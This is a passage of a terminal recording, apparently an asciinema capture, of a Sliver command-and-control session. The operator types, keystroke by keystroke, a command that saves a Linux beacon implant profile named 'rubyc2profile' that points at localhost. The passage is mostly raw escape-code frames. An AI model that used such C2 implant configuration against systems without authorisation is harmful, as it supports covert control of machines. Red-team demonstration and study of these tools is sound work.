\u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[25.438559, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[77D\u001b[9C\u001b[214D\u001b[77C\u001b[?25h"] +[25.542351, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[25.549237, "o", "\u001b[6n"] +[25.577048, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[25.579289, "o", "\u001b[214D\u001b[1A\u001b[78D\u001b[9C\u001b[214D\u001b[78C\u001b[?25h"] +[25.679219, "o", "\u001b[?25l"] +[25.689165, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[25.695019, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[25.695209, "o", "\u001b[1A\u001b[79D\u001b[9C\u001b[214D\u001b[79C\u001b[?25h"] +[25.881054, "o", "\u001b[?25l"] +[25.881692, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[25.896356, "o", "\u001b[6n"] +[25.915081, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[80D"] +[25.918243, "o", "\u001b[9C\u001b[214D\u001b[80C\u001b[?25h"] +[26.333571, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[26.345116, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2p\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.345455, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[81D\u001b[9C\u001b[214D\u001b[81C\u001b[?25h"] +[26.384697, "o", "\u001b[?25l"] +[26.386022, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[26.390181, "o", "\u001b[6n"] +[26.407139, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2pr\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[26.407269, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[82D\u001b[9C\u001b[214D\u001b[82C\u001b[?25h"] +[26.483373, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[26.488059, "o", "\u001b[6n"] +[26.492825, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2pro\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.494066, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[83D\u001b[9C\u001b[214D\u001b[83C\u001b[?25h"] +[26.61852, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[26.623731, "o", "\u001b[6n"] +[26.643919, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2prof\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.644161, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[84D\u001b[9C\u001b[214D\u001b[84C\u001b[?25h"] +[26.720473, "o", "\u001b[?25l\u001b[214D"] +[26.721567, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[26.724414, "o", "\u001b[6n"] +[26.73915, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profi\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.739685, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[85D\u001b[9C\u001b[214D\u001b[85C\u001b[?25h"] +[26.758393, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[26.761004, "o", "\u001b[6n"] +[26.769776, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profil\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.770802, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[86D\u001b[9C\u001b[214D\u001b[86C\u001b[?25h"] +[26.825606, "o", "\u001b[?25l"] +[26.826193, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[26.829997, "o", "\u001b[6n"] +[26.833447, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.834219, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[87D\u001b[9C\u001b[214D\u001b[87C\u001b[?25h"] +[27.027304, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[27.039152, "o", "\u001b[6n"] +[27.047505, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[27.049349, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[88D\u001b[9C\u001b[214D\u001b[88C\u001b[?25h"] +[28.392184, "o", "\u001b[?25l"] +[28.392807, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[28.403187, "o", "\u001b[6n"] +[28.428983, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mr\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.431242, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[89D\u001b[9C\u001b[214D\u001b[89C\u001b[?25h"] +[28.491078, "o", "\u001b[?25l\u001b[214D"] +[28.491447, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[28.496095, "o", "\u001b[6n"] +[28.501568, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mru\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.502265, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[90D\u001b[9C\u001b[214D\u001b[90C\u001b[?25h"] +[28.596319, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[28.607497, "o", "\u001b[6n"] +[28.632751, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mrub\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.633153, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[91D\u001b[9C\u001b[214D\u001b[91C\u001b[?25h"] +[28.737182, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[28.739762, "o", "\u001b[6n"] +[28.745354, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.745513, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[92D\u001b[9C\u001b[214D\u001b[92C\u001b[?25h"] +[28.886316, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[28.893976, "o", "\u001b[6n"] +[28.92261, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.924462, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[93D\u001b[9C\u001b[214D\u001b[93C\u001b[?25h"] +[30.669009, "o", "\u001b[93D\u001b[9C"] +[30.679951, "o", "\u001b[6n"] +[30.709595, "o", "\u001b[214D\u001b[93C\u001b[0J\u001b[214D\r\r\n"] +[30.71144, "o", "\u001b[0 q\r\n"] +[30.728861, "o", "\r\u001b[2K\u001b[1m\u001b[31m[!] \u001b[0mNo profile name specified\r\n\r\n"] +[30.737951, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[1 q"] +[30.738898, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[30.742844, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C"] +[30.743885, "o", "\u001b[214D\u001b[9C\u001b[?25h"] +[32.35367, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.372076, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[92D"] +[32.37311, "o", "\u001b[9C\u001b[214D\u001b[92C\u001b[?25h"] +[33.041767, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[33.053883, "o", "\u001b[6n"] +[33.063284, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.063865, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[93D\u001b[9C\u001b[214D\u001b[93C\u001b[?25h"] +[34.975713, "o", "\u001b[?25l\u001b[214D"] +[34.981131, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[34.986542, "o", "\u001b[6n"] +[35.022475, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby r\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.023477, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[94D\u001b[9C\u001b[214D\u001b[94C\u001b[?25h"] +[35.02377, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[35.026537, "o", "\u001b[6n"] +[35.035865, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby ru\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.03659, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[95D\u001b[9C\u001b[214D\u001b[95C\u001b[?25h"] +[35.082495, "o", "\u001b[?25l\u001b[214D"] +[35.08304, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[35.085452, "o", "\u001b[6n"] +[35.088682, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rub\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.089022, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[96D\u001b[9C\u001b[214D\u001b[96C\u001b[?25h"] +[35.215667, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[35.225629, "o", "\u001b[6n"] +[35.244071, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby ruby\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[97D\u001b[9C\u001b[214D\u001b[97C\u001b[?25h"] +[36.695789, "o", "\u001b[?25l\u001b[214D"] +[36.697237, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[36.700548, "o", "\u001b[6n"] +[36.721566, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[36.722071, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[98D\u001b[9C\u001b[214D\u001b[98C\u001b[?25h"] +[36.901814, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[36.907794, "o", "\u001b[6n"] +[36.934148, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[36.93475, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[99D\u001b[9C\u001b[214D\u001b[99C\u001b[?25h"] +[37.097056, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.103611, "o", "\u001b[6n"] +[37.11064, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2p\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.112279, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[100D\u001b[9C\u001b[214D\u001b[100C\u001b[?25h"] +[37.149812, "o", "\u001b[?25l"] +[37.151049, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.153439, "o", "\u001b[6n"] +[37.157455, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2pr\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.158179, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[101D\u001b[9C\u001b[214D\u001b[101C\u001b[?25h"] +[37.219831, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.227808, "o", "\u001b[6n"] +[37.232063, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2pro\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.232776, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[102D\u001b[9C\u001b[214D\u001b[102C\u001b[?25h"] +[37.373937, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.38667, "o", "\u001b[6n"] +[37.395682, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[37.396178, "o", "\u001b[1A\u001b[103D\u001b[9C\u001b[214D\u001b[103C\u001b[?25h"] +[37.44008, "o", "\u001b[?25l\u001b[214D"] +[37.440966, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.444557, "o", "\u001b[6n"] +[37.459194, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2profi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.459977, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[104D\u001b[9C\u001b[214D\u001b[104C\u001b[?25h"] +[37.494075, "o", "\u001b[?25l"] +[37.49511, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.497956, "o", "\u001b[6n"] +[37.501262, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2profil\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.501829, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[105D\u001b[9C\u001b[214D\u001b[105C\u001b[?25h"] +[37.540007, "o", "\u001b[?25l\u001b[214D"] +[37.540158, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.544333, "o", "\u001b[6n"] +[37.547712, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby rubyc2profile\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.548038, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[106D\u001b[9C\u001b[214D\u001b[106C\u001b[?25h"] +[38.237748, "o", "\u001b[106D\u001b[9C"] +[38.246779, "o", "\u001b[6n"] +[38.277642, "o", "\u001b[214D\u001b[106C\u001b[0J\u001b[214D"] +[38.278008, "o", "\r\r\n"] +[38.280107, "o", "\u001b[0 q\r\n"] +[38.320896, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mSaved new implant profile (beacon) rubyc2profile\r\n\r\n"] +[38.331488, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[38.331944, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.341378, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C"] +[38.341978, "o", "\u001b[214D\u001b[9C\u001b[?25h"] +[40.116503, "o", "\u001b[?25l"] +[40.119539, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.136581, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C"] +[40.138566, "o", "\u001b[214D\u001b[10C\u001b[?25h"] +[40.2158, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.222033, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[40.222296, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[40.298625, "o", "\u001b[?25l"] +[40.300622, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.317525, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[40.427201, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.437241, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[40.437611, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[40.486403, "o", 